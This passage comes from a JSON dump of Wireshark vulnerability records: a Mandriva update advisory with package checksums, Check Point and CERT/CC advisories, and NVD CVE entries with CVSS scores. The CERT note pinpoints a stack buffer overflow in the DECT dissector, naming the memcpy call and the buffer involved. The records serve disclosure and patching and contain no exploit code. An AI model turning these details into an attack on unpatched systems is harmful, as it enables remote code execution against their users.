86fb33388710ed3d08967c514c8ab25d 2010.1/i586/wireshark-1.2.16-0.1mdv2010.2.i586.rpm\r\n 7dea3da2061f08eb9510ee713e41d26f 2010.1/i586/wireshark-tools-1.2.16-0.1mdv2010.2.i586.rpm \r\n 64f8b99b3eb288f4553c55469ccf6edf 2010.1/SRPMS/wireshark-1.2.16-0.1mdv2010.2.src.rpm\r\n\r\n Mandriva Linux 2010.1/X86_64:\r\n 52e98d93947ec39bb36997baf7d95e3f 2010.1/x86_64/dumpcap-1.2.16-0.1mdv2010.2.x86_64.rpm\r\n f86e42d466f72559510182ec49d1ca04 2010.1/x86_64/lib64wireshark0-1.2.16-0.1mdv2010.2.x86_64.rpm\r\n 17bf8cf149d8639e2acef12633b3ae5e \r\n2010.1/x86_64/lib64wireshark-devel-1.2.16-0.1mdv2010.2.x86_64.rpm\r\n 5d7f97b0186213d477e51efda39d5c3e 2010.1/x86_64/rawshark-1.2.16-0.1mdv2010.2.x86_64.rpm\r\n 056ca1af6fff8f56fad1caae33c67691 2010.1/x86_64/tshark-1.2.16-0.1mdv2010.2.x86_64.rpm\r\n a49f98d9310bf9a6353a084a47f92b66 2010.1/x86_64/wireshark-1.2.16-0.1mdv2010.2.x86_64.rpm\r\n fe2fe64671b0ec435edbbb28bae5adaf \r\n2010.1/x86_64/wireshark-tools-1.2.16-0.1mdv2010.2.x86_64.rpm \r\n 64f8b99b3eb288f4553c55469ccf6edf 2010.1/SRPMS/wireshark-1.2.16-0.1mdv2010.2.src.rpm\r\n\r\n Corporate 4.0:\r\n a69827ff3c21384f271cd731412c4430 corporate/4.0/i586/dumpcap-1.2.16-0.1.20060mlcs4.i586.rpm\r\n 4ecdcbf70587de75f592a03ca761e7dd \r\ncorporate/4.0/i586/libwireshark0-1.2.16-0.1.20060mlcs4.i586.rpm\r\n ed2aa89f2a2aab3653967deb506db887 \r\ncorporate/4.0/i586/libwireshark-devel-1.2.16-0.1.20060mlcs4.i586.rpm\r\n 0898a45c9d84ae350b2d1459bf138202 corporate/4.0/i586/rawshark-1.2.16-0.1.20060mlcs4.i586.rpm\r\n 3e84772e55704d394938366dd84ec893 corporate/4.0/i586/tshark-1.2.16-0.1.20060mlcs4.i586.rpm\r\n 3f965ee985c45d0260ac5c68ccd02e8d corporate/4.0/i586/wireshark-1.2.16-0.1.20060mlcs4.i586.rpm\r\n 68ca555b3318b7f0535302eda1d15677 \r\ncorporate/4.0/i586/wireshark-tools-1.2.16-0.1.20060mlcs4.i586.rpm \r\n 398fb02a99f6403ec5544cd67202fada corporate/4.0/SRPMS/wireshark-1.2.16-0.1.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n b954d225ad5c758763cf58f214fa6a3d \r\ncorporate/4.0/x86_64/dumpcap-1.2.16-0.1.20060mlcs4.x86_64.rpm\r\n c4a34e696ad75d13a654b2fb12fe2d8c \r\ncorporate/4.0/x86_64/lib64wireshark0-1.2.16-0.1.20060mlcs4.x86_64.rpm\r\n 84363d6f92b894a9d8b7017fad5f34c0 \r\ncorporate/4.0/x86_64/lib64wireshark-devel-1.2.16-0.1.20060mlcs4.x86_64.rpm\r\n 410d24c1ebcc2756a5bed5f0398d0fa5 \r\ncorporate/4.0/x86_64/rawshark-1.2.16-0.1.20060mlcs4.x86_64.rpm\r\n c858c8141c49cb5f24958285aa95248d corporate/4.0/x86_64/tshark-1.2.16-0.1.20060mlcs4.x86_64.rpm\r\n 9cfdba3bc24c4cd3fc165340eb3a3970 \r\ncorporate/4.0/x86_64/wireshark-1.2.16-0.1.20060mlcs4.x86_64.rpm\r\n 82c157eb0ba46931b7a79d24dd87b414 \r\ncorporate/4.0/x86_64/wireshark-tools-1.2.16-0.1.20060mlcs4.x86_64.rpm \r\n 398fb02a99f6403ec5544cd67202fada corporate/4.0/SRPMS/wireshark-1.2.16-0.1.20060mlcs4.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n e63b833575fa0433d323b5f793c4baac mes5/i586/dumpcap-1.2.16-0.1mdvmes5.2.i586.rpm\r\n 04dab36a3b05dd35622ceea2c7e163e6 mes5/i586/libwireshark0-1.2.16-0.1mdvmes5.2.i586.rpm\r\n c44f0bc075b6581a86e0b32c947b08b0 mes5/i586/libwireshark-devel-1.2.16-0.1mdvmes5.2.i586.rpm\r\n 54c4fa786efdc086da2036dd2b179141 mes5/i586/rawshark-1.2.16-0.1mdvmes5.2.i586.rpm\r\n 5e561f4430612f841e9a144ff97db32e mes5/i586/tshark-1.2.16-0.1mdvmes5.2.i586.rpm\r\n 1633ab89f96cdf58d76ec66c26e6ea3a mes5/i586/wireshark-1.2.16-0.1mdvmes5.2.i586.rpm\r\n 8d20bd293e3770f1740b965147fe73ab mes5/i586/wireshark-tools-1.2.16-0.1mdvmes5.2.i586.rpm \r\n e484e78f2d63a5c018c9e3afbba88ba2 mes5/SRPMS/wireshark-1.2.16-0.1mdvmes5.2.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n f21561b6ad51f07d80f2329eb9d3c9b6 mes5/x86_64/dumpcap-1.2.16-0.1mdvmes5.2.x86_64.rpm\r\n 014afb1b8188a15048f1dc70012d296f mes5/x86_64/lib64wireshark0-1.2.16-0.1mdvmes5.2.x86_64.rpm\r\n 8b539d0361dc0b0a2ddfb10a369f26d1 \r\nmes5/x86_64/lib64wireshark-devel-1.2.16-0.1mdvmes5.2.x86_64.rpm\r\n 6f3e9f63fd1eca753720d37c232f7c6d mes5/x86_64/rawshark-1.2.16-0.1mdvmes5.2.x86_64.rpm\r\n de70d4dc7dfa466d80ad79b9114046c8 mes5/x86_64/tshark-1.2.16-0.1mdvmes5.2.x86_64.rpm\r\n d4e1a9453effbb5324fafd6a9ca8dcd1 mes5/x86_64/wireshark-1.2.16-0.1mdvmes5.2.x86_64.rpm\r\n 03d0d4fa8407616e53759c4f842c3061 mes5/x86_64/wireshark-tools-1.2.16-0.1mdvmes5.2.x86_64.rpm \r\n e484e78f2d63a5c018c9e3afbba88ba2 mes5/SRPMS/wireshark-1.2.16-0.1mdvmes5.2.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFNzB5nmqjQ0CJFipgRAt9xAKC2QfPw8pvrkptvxl082UcKMKKduwCdHDFr\r\nbnghMK+643rsoMXOWgWLP9Q=\r\n=gvBt\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "cvss3": {}, "published": "2011-05-16T00:00:00", "title": "[ MDVSA-2011:083 ] wireshark", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2011-1592", "CVE-2011-1590", "CVE-2011-1591"], "modified": "2011-05-16T00:00:00", "id": "SECURITYVULNS:DOC:26372", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26372", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:42", "description": "Multiple vulnerabilities on .pcap files parsing.", "edition": 1, "cvss3": {}, "published": "2011-06-02T00:00:00", "title": "Wireshark multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2011-1592", "CVE-2011-1590", "CVE-2011-1591"], "modified": "2011-06-02T00:00:00", "id": "SECURITYVULNS:VULN:11678", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11678", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:23:31", "description": "A stack buffer overflow vulnerability has been reported in Wireshark DECT dissector. The vulnerability is caused due to improper bounds checking. A remote attacker can exploit this vulnerability by enticing a user to read a specially crafted packet trace file. Successful exploitation would allow an attacker to execute arbitrary code or terminate the application resulting in a denial of service condition.", "cvss3": {}, "published": "2012-11-25T00:00:00", "type": "checkpoint_advisories", "title": "Wireshark DECT Dissector Stack Buffer Overflow (CVE-2011-1591)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1591"], "modified": "2015-11-22T00:00:00", "id": "CPAI-2012-358", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-02T10:40:18", "description": "A stack buffer overflow vulnerability has been reported in Wireshark DECT dissector. The vulnerability is caused due to improper bounds checking. A remote attacker can exploit this vulnerability by enticing a user to read a specially crafted packet trace file. Successful exploitation would allow an attacker to execute arbitrary code or terminate the application resulting in a denial of service condition.", "cvss3": {}, "published": "2014-03-03T00:00:00", "type": "checkpoint_advisories", "title": "Wireshark DECT Dissector Stack Buffer Overflow - Ver2 (CVE-2011-1591)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1591"], "modified": "2014-03-03T00:00:00", "id": "CPAI-2014-1112", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-02T08:00:22", "description": "A buffer overflow vulnerability has been reported in Wireshark. The vulnerability is due to incorrect implementation of the SigComp UDVM Dissector. An attacker can exploit this issue by sending a malicious sigComp traffic in the internet.", "cvss3": {}, "published": "2015-03-26T00:00:00", "type": "checkpoint_advisories", "title": "Wireshark SigComp UDVM Dissector Remote Code Execution - Ver2 (CVE-2010-2287)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2287"], "modified": "2015-03-26T00:00:00", "id": "CPAI-2015-0388", "href": "", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-18T04:02:55", "description": "A buffer overflow vulnerability has been reported in Wireshark. The vulnerability is due to incorrect implementation of the SigComp UDVM Dissector. An attacker can exploit this issue by sending a malicious sigComp traffic in the internet.", "cvss3": {}, "published": "2015-03-26T00:00:00", "type": "checkpoint_advisories", "title": "Wireshark SigComp UDVM Dissector Remote Code Execution - Ver2 (CVE-2010-2287)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2287"], "modified": "2015-03-26T00:00:00", "id": "CPAI-2015-0163", "href": "", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2021-09-28T17:51:00", "description": "### Overview\n\nWireshark's DECT dissector contains a remote code execution vulnerability in the context of the user running a packet capture or reading a packet capture file.\n\n### Description\n\nPaul Makowski's report states:\n\n_/epan/dissectors/packet-dect.c contains a stack-based buffer overflow via a call to memcpy() whose length is controlled by the attacker. Absent exploit mitigations independant of Wireshark's default build options, an attacker is able to execute arbitrary code in the context of the user running a packet capture. On *NIX systems, such capability is frequently reserved for the root user. The overflowable buffer is pkt_bfield.Data._ \n \n--- \n \n### Impact\n\nAn attacker may cause any active capture or .pcap dissection to crash Wireshark/tshark. Remote code execution is also possible. \n \n--- \n \n### Solution\n\n**Apply an Update** \n \nUpgrade to Wireshark 1.4.5. Several other security related fixes are also included in this version. \n \n--- \n \n### Vendor Information\n\n243670\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Wireshark Affected\n\nUpdated: April 18, 2011 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.wireshark.org/lists/wireshark-announce/201104/msg00002.html>\n * <http://www.wireshark.org/docs/relnotes/wireshark-1.4.5.html>\n * <http://www.wireshark.org/download.html>\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n * <http://www.wireshark.org/lists/wireshark-announce/201104/msg00002.html>\n * <http://www.wireshark.org/docs/relnotes/wireshark-1.4.5.html>\n * <http://www.wireshark.org/download.html>\n * <http://blog.ring0.me/2012/01/wireshark-14x-145-cve-2011-1591.html>\n\n### Acknowledgements\n\nThanks to Paul Makowski working for CERT/CC for reporting this vulnerability.\n\nThis document was written by Michael Orlando.\n\n### Other Information\n\n**CVE IDs:** | [None](<http://web.nvd.nist.gov/vuln/detail/None>) \n---|--- \n**Severity Metric:** | 0.09 \n**Date Public:** | 2011-04-17 \n**Date First Published:** | 2011-04-18 \n**Date Last Updated: ** | 2012-01-25 03:28 UTC \n**Document Revision: ** | 6 \n", "cvss3": {}, "published": "2011-04-18T00:00:00", "type": "cert", "title": "Wireshark DECT dissector vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1591"], "modified": "2012-01-25T03:28:00", "id": "VU:243670", "href": "https://www.kb.cert.org/vuls/id/243670", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T11:56:13", "description": "Stack-based buffer overflow in the DECT dissector in epan/dissectors/packet-dect.c in Wireshark 1.4.x before 1.4.5 allows remote attackers to execute arbitrary code via a crafted .pcap file.", "cvss3": {}, "published": "2011-04-29T22:55:00", "type": "cve", "title": "CVE-2011-1591", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1591"], "modified": "2017-09-19T01:32:00", "cpe": ["cpe:/a:wireshark:wireshark:1.4.2", "cpe:/a:wireshark:wireshark:1.4.0", "cpe:/a:wireshark:wireshark:1.4.4", "cpe:/a:wireshark:wireshark:1.4.3", "cpe:/a:wireshark:wireshark:1.4.1"], "id": "CVE-2011-1591", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1591", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:wireshark:wireshark:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.4.4:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:09:48", "description": "The SMB dissector in Wireshark 0.99.6 through 1.0.13, and 1.2.0 through 1.2.8 allows remote attackers to cause a denial of service (NULL pointer dereference) via unknown vectors.", "cvss3": {}, "published": "2010-06-15T14:04:00", "type": "cve", "title": "CVE-2010-2283", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.3, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2283"], "modified": "2017-09-19T01:31:00", "cpe": ["cpe:/a:wireshark:wireshark:0.99.8", "cpe:/a:wireshark:wireshark:1.0.9", "cpe:/a:wireshark:wireshark:1.2.6", "cpe:/a:wireshark:wireshark:1.0.6", "cpe:/a:wireshark:wireshark:1.0.2", "cpe:/a:wireshark:wireshark:1.0.0", "cpe:/a:wireshark:wireshark:0.99.7", "cpe:/a:wireshark:wireshark:1.0.13", "cpe:/a:wireshark:wireshark:0.99.6", "cpe:/a:wireshark:wireshark:1.2.4", "cpe:/a:wireshark:wireshark:1.2.0", "cpe:/a:wireshark:wireshark:1.0.11", "cpe:/a:wireshark:wireshark:1.2.5", "cpe:/a:wireshark:wireshark:1.0.7", "cpe:/a:wireshark:wireshark:1.2.1", "cpe:/a:wireshark:wireshark:1.0.3", "cpe:/a:wireshark:wireshark:1.2.2", "cpe:/a:wireshark:wireshark:1.2.8", "cpe:/a:wireshark:wireshark:1.0.1", "cpe:/a:wireshark:wireshark:1.0.12", "cpe:/a:wireshark:wireshark:1.0.10", "cpe:/a:wireshark:wireshark:1.0.8", "cpe:/a:wireshark:wireshark:1.0.4", "cpe:/a:wireshark:wireshark:1.2.3", "cpe:/a:wireshark:wireshark:1.0.5", "cpe:/a:wireshark:wireshark:1.2.7"], "id": "CVE-2010-2283", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2283", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:wireshark:wireshark:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:09:52", "description": "The SigComp Universal Decompressor Virtual Machine dissector in Wireshark 0.10.7 through 1.0.13 and 1.2.0 through 1.2.8 allows remote attackers to cause a denial of service (infinite loop) via unknown vectors.", "cvss3": {}, "published": "2010-06-15T14:04:00", "type": "cve", "title": "CVE-2010-2286", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.3, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2286"], "modified": "2017-09-19T01:31:00", "cpe": ["cpe:/a:wireshark:wireshark:0.99.2", "cpe:/a:wireshark:wireshark:0.99.4", "cpe:/a:wireshark:wireshark:0.10.13", "cpe:/a:wireshark:wireshark:0.99.8", "cpe:/a:wireshark:wireshark:1.0.9", "cpe:/a:wireshark:wireshark:1.2.6", "cpe:/a:wireshark:wireshark:1.0.6", "cpe:/a:wireshark:wireshark:0.10.9", "cpe:/a:wireshark:wireshark:0.99.5", "cpe:/a:wireshark:wireshark:1.0.2", "cpe:/a:wireshark:wireshark:0.8.20", "cpe:/a:wireshark:wireshark:1.0.0", "cpe:/a:wireshark:wireshark:0.99.7", "cpe:/a:wireshark:wireshark:1.0.13", "cpe:/a:wireshark:wireshark:0.99.6", "cpe:/a:wireshark:wireshark:0.99.3", "cpe:/a:wireshark:wireshark:1.2.4", "cpe:/a:wireshark:wireshark:1.2.0", "cpe:/a:wireshark:wireshark:1.0.11", "cpe:/a:wireshark:wireshark:0.99.1", "cpe:/a:wireshark:wireshark:1.2.5", "cpe:/a:wireshark:wireshark:1.0.7", "cpe:/a:wireshark:wireshark:1.2.1", "cpe:/a:wireshark:wireshark:1.0.3", "cpe:/a:wireshark:wireshark:1.2.2", "cpe:/a:wireshark:wireshark:0.10.8", "cpe:/a:wireshark:wireshark:1.2.8", "cpe:/a:wireshark:wireshark:0.10.14", "cpe:/a:wireshark:wireshark:1.0.12", "cpe:/a:wireshark:wireshark:1.0.1", "cpe:/a:wireshark:wireshark:0.10.12", "cpe:/a:wireshark:wireshark:0.10.11", "cpe:/a:wireshark:wireshark:0.10.10", "cpe:/a:wireshark:wireshark:1.0.10", "cpe:/a:wireshark:wireshark:1.0.8", "cpe:/a:wireshark:wireshark:0.10.7", "cpe:/a:wireshark:wireshark:1.0.4", "cpe:/a:wireshark:wireshark:1.2.3", "cpe:/a:wireshark:wireshark:1.0.5", "cpe:/a:wireshark:wireshark:0.99.0", "cpe:/a:wireshark:wireshark:1.2.7"], "id": "CVE-2010-2286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2286", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:wireshark:wireshark:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.8.20:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.14:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.11:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.13:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.10:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.12:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:56:12", "description": "The X.509if dissector in Wireshark 1.2.x before 1.2.16 and 1.4.x before 1.4.5 does not properly initialize certain global variables, which allows remote attackers to cause a denial of service (application crash) via a crafted .pcap file.", "cvss3": {}, "published": "2011-04-29T22:55:00", "type": "cve", "title": "CVE-2011-1590", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": 